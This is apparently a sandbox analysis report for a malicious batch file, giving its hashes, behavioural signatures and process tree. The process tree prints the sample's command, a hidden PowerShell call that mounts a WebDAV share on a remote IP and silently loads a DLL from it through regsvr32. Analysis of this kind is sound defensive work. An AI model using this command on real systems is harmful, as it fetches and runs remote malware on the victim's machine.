Analysis
-
max time kernel
100s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
19-07-2024 07:25
Static task
static1
Behavioral task
behavioral1
Sample
16626210012441519320.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
16626210012441519320.bat
Resource
win10v2004-20240709-en
General
-
Target
16626210012441519320.bat
-
Size
3KB
-
MD5
95db93f63003dcfe188a45f0c07bd5a2
-
SHA1
2585d82ed45beb7b2e05ddec07daea988ae00eb7
-
SHA256
418e2f3d0183ebb11fe64e86d27d001fa3ab3e29d345bb93bf68a24eabcc7ea2
-
SHA512
636811f2d4f95a0b4e26abd121ebee6c8a2a7a1dd8f27a90fc50e758f6f6bae4d3fdd11bafea5a05c9dbdc2303dda05c4e2d7c84ba209b1e7924283d73a79153
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2932 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2932 powershell.exe 2932 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2932 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3228 wordpad.exe 3228 wordpad.exe 3228 wordpad.exe 3228 wordpad.exe 3228 wordpad.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 1600 wrote to memory of 3228 1600 cmd.exe 84 PID 1600 wrote to memory of 3228 1600 cmd.exe 84 PID 1600 wrote to memory of 2932 1600 cmd.exe 86 PID 1600 wrote to memory of 2932 1600 cmd.exe 86 PID 2932 wrote to memory of 2260 2932 powershell.exe 88 PID 2932 wrote to memory of 2260 2932 powershell.exe 88 PID 2932 wrote to memory of 3756 2932 powershell.exe 89 PID 2932 wrote to memory of 3756 2932 powershell.exe 89
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\16626210012441519320.bat"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1600 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:3228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\82273137020175.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2260
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\82273137020175.dll3⤵PID:3756
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc1⤵PID:632
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82